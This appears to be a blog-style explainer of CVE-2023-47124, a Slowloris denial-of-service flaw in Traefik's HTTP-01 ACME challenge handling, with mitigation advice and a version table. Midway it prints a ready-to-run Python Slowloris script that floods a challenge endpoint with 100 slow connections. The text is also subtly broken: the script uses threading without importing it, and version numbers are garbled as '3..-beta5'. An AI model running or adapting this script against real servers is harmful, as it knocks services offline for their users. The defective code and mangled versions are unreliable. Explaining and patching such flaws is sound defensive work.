CVE-2023-47124 - How Attackers Exploited Traefik’s HTTPChallenge With a Slowloris Attack

Traefik is a popular open-source HTTP reverse proxy and load balancer widely used for routing and securing traffic to microservices and web applications. However, in late 2023, researchers uncovered a vulnerability (CVE-2023-47124) affecting Traefik’s integration with Let’s Encrypt’s HTTP-01 challenge. In simple terms, malicious actors could exploit how Traefik handled certificate requests to launch a _Slowloris_ attack and potentially deny service to your apps.

This article breaks down how the vulnerability worked, who it affects, and how you can protect your services—even if you can’t upgrade right away.

What is CVE-2023-47124?

CVE-2023-47124 is a vulnerability found in Traefik (before versions 2.10.6 and 3..-beta5) when it’s configured to use HTTPChallenge from Let’s Encrypt. The bug lies in the way Traefik allows up to 50 seconds for a client to respond to an HTTP-01 challenge.

Problem: An attacker can start hundreds or thousands of very slow HTTP connections to the challenge endpoint (a Slowloris attack). Since each connection consumes a server process/thread, legitimate users might be blocked from accessing your services while the attacker’s connections are open.

Official Advisory:
- GitHub Security Advisory GHSA-xghj-w2x5-7q3v
- NVD Details for CVE-2023-47124

Traefik serves HTTP-01 challenge for Let’s Encrypt

- When a certificate needs to be issued or renewed, Traefik temporarily hosts a special file on http://yourdomain/.well-known/acme-challenge/token.

Attacker opens many slow HTTP connections

- Attackers connect to the challenge URL and send their request bodies _very slowly_ (“drip feeding” a few bytes at a time).

Traefik keeps sockets open

- Traefik holds these requests open for the full 50 seconds. If enough slow requests pile up, all worker threads/sockets can be exhausted.

Denial of Service

- Legitimate clients can’t connect or their connections are delayed—essentially a “Low and Slow” DoS attack.

Code Snippet: Example Slowloris Attack Script

Here’s a simple Python script illustrating how an attacker could perform a Slowloris attack against a Traefik instance using the HTTP-01 challenge:

import socket
import time

HOST = 'your-traefik-server.com'
PORT = 80

def slowloris_attack():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))
    request = f"GET /.well-known/acme-challenge/slowloris HTTP/1.1\r\nHost: {HOST}\r\n"
    sock.send(request.encode())
    # Slowly send the rest of the headers, one line every 5 seconds
    for i in range(10):
        sock.send(b"X-a: b\r\n")
        time.sleep(5)
    # Keep the connection open without sending the final CRLF
    time.sleep(60)
    sock.close()

# Launch 100 concurrent slow connections (for demonstration purposes)
for _ in range(100):
    threading.Thread(target=slowloris_attack).start()

Note: Don’t attack real servers. This is for educational purposes only.

Upgrade Immediately:

- Upgrade to Traefik 2.10.6 or 3..-beta5.

Switch to More Secure ACME Providers:

- If you can’t upgrade, switch from HTTPChallenge to TLSChallenge or DNSChallenge. These do not expose the server to HTTP-level Slowloris attacks.

Use Reverse Proxy Protections:

- If possible, proxy connections to Traefik behind nginx or haproxy and limit request timeout/connection rates.

Summary Table

| Version | Vulnerable? | HTTPChallenge | TLSChallenge | DNSChallenge |
|--------------------|-------------|---------------|--------------|--------------|
| 2.10.5 and earlier | Yes | Affected | Not affected | Not affected |
| 2.10.6+ | No | Not affected | Not affected | Not affected |
| 3..-beta4- | Yes | Affected | Not affected | Not affected |
| 3..-beta5+ | No | Not affected | Not affected | Not affected |

References

- Traefik Security Advisory: GHSA-xghj-w2x5-7q3v
- Let’s Encrypt Challenge Types
- CVE-2023-47124 NVD Entry
- Slowloris attack explained (OWASP)

Key Takeaways

- Traefik’s mishandling of the HTTPChallenge in older versions made it easy for attackers to tie up server resources with Slowloris attacks.

If you use HTTPChallenge with Traefik, update ASAP or switch to safer challenge types.

- Always review the security posture of your reverse proxies and how they handle long-lived or slow client connections.

Stay safe! If you have any questions, check the linked advisories and talk to your security team.

Timeline

Published on: 12/04/2023 21:15:33 UTC
Last modified on: 12/07/2023 21:01:24 UTC